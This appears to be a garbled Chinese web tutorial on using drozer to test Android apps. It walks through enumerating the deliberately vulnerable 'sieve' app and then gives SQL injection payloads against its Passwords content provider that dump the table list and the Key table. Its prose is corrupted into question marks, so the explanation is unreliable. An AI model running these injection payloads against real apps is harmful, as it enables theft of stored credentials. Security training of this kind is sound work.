????drozer????Android???????
???????????? ???????[ 2015/3/17 15:06:39 ] ????????WEB???? ?????? ??????? Android
???????????????
????1. ???
?????????????http://mwr.to/drozer????Drozer (Windows Installer)
?????????????Android?豸?а??agent.apk
????adb install agent.apk
????2. ???
?????????????PC?????adb???ж????????????Drozer??????31415
????adb forward tcp:31415 tcp:31415
?????????????Android?豸?????Drozer Agent
???????embedded server-enable
??????????????PC?????Drozer console
????drozer console connect
???????????????
????1.???????
????dz> run app.package.list -f sieve
????com.mwr.example.sieve
????2.?????????????
????run app.package.info -a com.mwr.example.sieve
????3.?????????
????run app.package.attacksurface com.mwr.example.sieve
????4.Activity
??????1?????activity???
????run app.activity.info -a com.mwr.example.sieve
??????2?????activity
????run app.activity.start --component com.mwr.example.sieve
????dz> help app.activity.start
????usage: run app.activity.start [-h] [--action ACTION] [--category CATEGORY]
????[--component PACKAGE COMPONENT] [--data-uri DATA_URI]
????[--extra TYPE KEY VALUE] [--flags FLAGS [FLAGS ...]]
????[--mimetype MIMETYPE]
????5.Content Provider
??????1?????Content Provider???
????run app.provider.info -a com.mwr.example.sieve
??????2??Content Providers??????й???
???????????п???????Uri??
????run scanner.provider.finduris -a com.mwr.example.sieve
???????????Uri???????
????run app.provider.query
????content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
???????????????????????
??????3??Content Providers??SQL???
????run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'"
????run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
?????????????????SQL???
?????г????б??
????run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"
???????????????Key???е??????
????run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"
??????4???????SQL??????????
????run scanner.provider.injection -a com.mwr.example.sieve
????run scanner.provider.traversal -a com.mwr.example.sieve
??????
???·???
??????????????????
2023/3/23 14:23:39???д?ò??????????
2023/3/22 16:17:39????????????????????Щ??
2022/6/14 16:14:27??????????????????????????
2021/10/18 15:37:44???????????????
2021/9/17 15:19:29???·???????·
2021/9/14 15:42:25?????????????
2021/5/28 17:25:47??????APP??????????
2021/5/8 17:01:11
sales@spasvo.com